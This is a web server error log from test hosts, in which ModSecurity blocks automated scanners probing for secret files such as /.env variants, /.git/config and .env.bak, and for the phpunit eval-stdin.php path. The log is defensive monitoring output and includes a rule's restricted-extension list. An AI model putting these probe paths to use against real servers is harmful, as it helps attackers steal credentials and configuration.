[Wed Aug 06 00:40:59.328942 2025] [:error] [pid 1737085] [client 217.217.252.16:53353] [client 217.217.252.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJKIexEhtmJ5esit6iHTcAAAAAg"]
[Wed Aug 06 00:41:02.088073 2025] [authz_core:error] [pid 1737080] [client 217.217.252.16:53478] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Sun Aug 10 17:00:51.581310 2025] [:error] [pid 1839637] [client 3.84.178.235:36380] [client 3.84.178.235] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJi0I-81dc7fnjUixxDs3QAAAAM"]
[Sun Aug 10 17:00:51.583377 2025] [:error] [pid 1839637] [client 3.84.178.235:36380] [client 3.84.178.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJi0I-81dc7fnjUixxDs3QAAAAM"]
[Sun Aug 10 17:00:51.583643 2025] [:error] [pid 1839637] [client 3.84.178.235:36380] [client 3.84.178.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJi0I-81dc7fnjUixxDs3QAAAAM"]
[Tue Aug 12 10:37:42.689656 2025] [:error] [pid 1892093] [client 206.189.131.60:47070] [client 206.189.131.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJr9VpNZgsyW7y9PCgJiYwAAAAc"]
[Tue Aug 12 10:37:42.691672 2025] [:error] [pid 1892093] [client 206.189.131.60:47070] [client 206.189.131.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJr9VpNZgsyW7y9PCgJiYwAAAAc"]
[Tue Aug 12 10:37:42.691859 2025] [:error] [pid 1892093] [client 206.189.131.60:47070] [client 206.189.131.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJr9VpNZgsyW7y9PCgJiYwAAAAc"]
[Tue Aug 12 10:37:53.652527 2025] [authz_core:error] [pid 1890849] [client 206.189.131.60:57922] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/jquery-file-upload
[Tue Aug 12 10:38:02.483496 2025] [authz_core:error] [pid 1890898] [client 206.189.131.60:60248] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/webroot
[Tue Aug 12 10:38:44.109908 2025] [authz_core:error] [pid 1890898] [client 206.189.131.60:59822] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Tue Aug 12 10:38:49.942213 2025] [:error] [pid 1890898] [client 206.189.131.60:53350] [client 206.189.131.60] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJr9mT1VqnzkP5E360_y3QAAAAU"]
[Tue Aug 12 10:38:49.942531 2025] [:error] [pid 1890898] [client 206.189.131.60:53350] [client 206.189.131.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJr9mT1VqnzkP5E360_y3QAAAAU"]
[Tue Aug 12 10:38:49.942729 2025] [:error] [pid 1890898] [client 206.189.131.60:53350] [client 206.189.131.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aJr9mT1VqnzkP5E360_y3QAAAAU"]
[Wed Aug 13 06:10:09.923159 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwQId_0TTE-3HOKQ8mTGgAAAAQ"]
[Wed Aug 13 06:10:09.923621 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwQId_0TTE-3HOKQ8mTGgAAAAQ"]
[Wed Aug 13 06:10:09.923861 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJwQId_0TTE-3HOKQ8mTGgAAAAQ"]
[Wed Aug 13 06:10:09.952003 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJwQId_0TTE-3HOKQ8mTGwAAAAQ"]
[Wed Aug 13 06:10:09.952359 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJwQId_0TTE-3HOKQ8mTGwAAAAQ"]
[Wed Aug 13 06:10:09.952591 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJwQId_0TTE-3HOKQ8mTGwAAAAQ"]
[Wed Aug 13 06:10:09.991277 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJwQId_0TTE-3HOKQ8mTHAAAAAQ"]
[Wed Aug 13 06:10:09.991548 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJwQId_0TTE-3HOKQ8mTHAAAAAQ"]
[Wed Aug 13 06:10:09.991734 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJwQId_0TTE-3HOKQ8mTHAAAAAQ"]
[Wed Aug 13 06:10:10.019057 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHQAAAAQ"]
[Wed Aug 13 06:10:10.019355 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHQAAAAQ"]
[Wed Aug 13 06:10:10.019621 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHQAAAAQ"]
[Wed Aug 13 06:10:10.047188 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHgAAAAQ"]
[Wed Aug 13 06:10:10.047480 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHgAAAAQ"]
[Wed Aug 13 06:10:10.047734 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHgAAAAQ"]
[Wed Aug 13 06:10:10.097584 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHwAAAAQ"]
[Wed Aug 13 06:10:10.097846 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHwAAAAQ"]
[Wed Aug 13 06:10:10.098036 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJwQIt_0TTE-3HOKQ8mTHwAAAAQ"]
[Wed Aug 13 06:10:10.145021 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIAAAAAQ"]
[Wed Aug 13 06:10:10.145279 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIAAAAAQ"]
[Wed Aug 13 06:10:10.145465 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIAAAAAQ"]
[Wed Aug 13 06:10:10.171474 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIQAAAAQ"]
[Wed Aug 13 06:10:10.171738 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIQAAAAQ"]
[Wed Aug 13 06:10:10.171933 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIQAAAAQ"]
[Wed Aug 13 06:10:10.209566 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIgAAAAQ"]
[Wed Aug 13 06:10:10.209827 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIgAAAAQ"]
[Wed Aug 13 06:10:10.210015 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIgAAAAQ"]
[Wed Aug 13 06:10:10.253138 2025] [:error] [pid 1915763] [client 185.177.72.12:16988] [client 185.177.72.12] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aJwQIt_0TTE-3HOKQ8mTIwAAAAQ"]
